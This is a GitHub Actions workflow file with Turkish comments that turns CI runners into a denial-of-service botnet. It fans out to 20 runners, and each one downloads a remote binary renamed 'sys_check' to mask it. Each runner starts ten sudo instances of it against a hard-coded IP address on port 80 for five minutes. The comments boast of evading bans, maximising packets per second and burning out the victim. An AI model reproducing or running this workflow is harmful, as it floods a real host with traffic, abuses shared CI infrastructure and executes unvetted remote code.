name: AUTO-MAX-ATTACK
on:
  workflow_dispatch: # Manuel başlatmak için
  push: # Her kod gönderdiğinde başlasın

jobs:
  prepare:
    runs-on: ubuntu-latest
    outputs:
      matrix: ${{ steps.set-matrix.outputs.matrix }}
    steps:
      - id: set-matrix
        # BURASI SIR: GitHub'ın limitlerini zorlamak için 20'lik bir dizi oluşturuyoruz
        run: echo "matrix=$(seq -s, 1 20 | jq -R 'split(",")')" >> $GITHUB_OUTPUT

  attack:
    needs: prepare
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false # Bir makine ban yerse diğerleri durmasın!
      matrix:
        node: ${{ fromJson(needs.prepare.outputs.matrix) }}
    
    steps:
      - name: Namluya Sür
        run: |
          # İsmi maskele: 'sys_check'
          curl -L "https://github.com/betoaiaio/brsovhv2/raw/refs/heads/master/brsovhv2" -o sys_check
          chmod +x sys_check
          
          # HEDEF VE PORT (Buraya dikkat)
          TARGET="185.121.226.12"
          PORT="80"
          
          echo "Node ${{ matrix.node }} is engaging..."
          
          # İçeride de 10 koldan saldırı açıyoruz (Maksimum PPS)
          for i in {1..10}; do
            sudo timeout 300 ./sys_check $TARGET $PORT > /dev/null 2>&1 &
          done
          
          # 5 dakika boyunca kurbanın beynini yak
          sleep 305
